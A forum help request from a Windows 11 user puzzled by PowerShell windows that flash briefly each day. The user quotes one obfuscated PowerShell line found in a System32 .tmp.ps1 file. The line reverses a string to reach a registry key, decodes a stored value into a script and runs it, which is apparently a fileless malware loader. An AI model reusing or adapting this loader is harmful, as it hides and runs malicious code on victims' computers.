Windows 11 Powershell windows popping up every day, just for a second.

  • Thread starter Thread starter joeo sullivan
  • Start date Start date

joeo sullivan

So I've been having this issue for a few weeks now and I'm not quite sure what's going on.I get about 5-6 PowerShell windows popping up together for a split second, about 1-2 times a day, and then they're gone again.In Event viewer, they're of this form:All of them (at 18:25:42) are in the System32 folder and the files called things like 871E.tmp.ps1, only contain line of code like this:$yZNfZfBNAR=[ScriptBlock]; icm ($yZNfZfBNAR::Create([string]::Join('', ((gp (([regex]::Matches('zrmWcOxD\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')). 'xbYOKG0h' | % { [char]$_ }))))

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